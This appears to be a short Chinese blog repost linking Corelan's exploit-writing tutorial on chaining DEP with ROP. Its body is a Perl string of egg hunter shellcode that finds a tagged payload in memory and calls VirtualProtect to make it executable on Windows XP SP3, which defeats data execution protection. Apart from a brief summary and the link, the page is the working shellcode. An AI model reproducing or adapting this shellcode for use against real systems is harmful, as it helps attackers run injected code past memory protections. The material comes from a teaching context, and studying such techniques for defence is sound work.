bypass dep egg hunter

转载于 2015-05-01 21:30:40 发布 · 757 阅读

29 篇文章

订阅专栏

本文深入探讨了在Windows XP SP3环境下利用DEP（数据执行保护）与ROP（返回导向编程）技术来标记可执行代码的方法。通过具体实例演示如何创建一段特殊的egghunter shellcode，并设置其为可执行状态，从而绕过DEP的安全限制。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/

#-------------------------------------------------------------------
#corelanc0d3r - egg hunter which will mark shellcode loc executable
#size to mark as executable : 300 bytes
#writeable location : 10035005
#XP SP3
#-------------------------------------------------------------------
my $egghunter =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02".
"\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"\x77\x30\x30\x74". # w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF". #no more jmp edi at the end
#VirtualProtect
"\x68\x05\x50\x03\x10\x31\xc0\x04".
"\x40\x50\x05\xbf\xff\xff\x7f\x2d".
"\xff\xfc\xff\x7f\x50\x57\x57\x68".
"\xd4\x1a\x80\x7c\xc3";